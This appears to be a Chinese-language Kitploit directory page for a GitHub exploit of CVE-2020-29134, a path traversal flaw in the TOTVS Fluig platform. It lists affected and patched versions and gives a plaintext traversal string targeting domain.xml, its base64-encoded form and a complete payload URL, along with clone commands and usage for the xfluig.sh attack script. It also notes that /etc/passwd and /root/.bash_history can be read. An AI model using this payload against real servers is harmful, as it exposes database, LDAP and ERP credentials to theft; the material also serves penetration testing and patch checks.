Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-29134 — Exploit CVE-2020-29134 - TOTVS Fluig Platform - Path Traversal | Kitploit
工具/GitHubGitHub/ls4ss/cve-2020-29134
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubls4ss/cve-2020-29134

CVE-2020-29134

Exploit CVE-2020-29134 - TOTVS Fluig Platform - Path Traversal

查看仓库
313年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

TOTVS Fluig 平台

root@kitploit:~
 Fluig 是一款生产力与协作平台,可与 ERP 系统及您公司的其他系统集成,彻底改变您和团队的工作方式。

CVE-2020-29134

root@kitploit:~
 TOTVS Fluig 平台允许通过 base64 编码的参数进行路径遍历。利用此漏洞,可以读取敏感的 XML 文件,这些文件包含访问数据库的数据,在某些情况下还包含 LDAP 连接和 ERP 系统集成的数据。此外,还可以探索系统文件,例如 /etc/passwd 和 /root/.bash_history。

受影响版本

root@kitploit:~
--
<== Fluig Lake 1.7.0
<== Fluig 1.6.5
<== Fluig 1.6.4
...

已修补版本

root@kitploit:~
<== Fluig Lake 1.7.0-210303 (已修补)
<== Fluig 1.6.5-210308 (已修补)
<== Fluig 1.6.4-210308 (已修补)

构建有效载荷

alt text

攻击向量

root@kitploit:~
 http://fluig.host.com/volume/stream/Rmx1aWc=/

路径遍历明文

root@kitploit:~
 ?t=1&vol=Default&id=1&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml

路径遍历 base64 编码

root@kitploit:~
 P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=

有效载荷

root@kitploit:~
 http://HOST.FLUIG.COM/volume/stream/Rmx1aWc=/P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=

Exploit-DB 参考

root@kitploit:~
 https://www.exploit-db.com/exploits/49622

克隆仓库

root@kitploit:~
 # git clone https://github.com/lucxssouza/CVE-2020-29134.git
 # cd CVE-2020-29134
 # chmod +x xfluig.sh

使用方法

root@kitploit:~
 示例1: ./xfluig.sh http://fluig.host.com REQUESTS_WFUZZ (由 wfuzz 生成的请求数量)

 示例2: ./xfluig.sh http://fluig.host.com:PORT
下载工具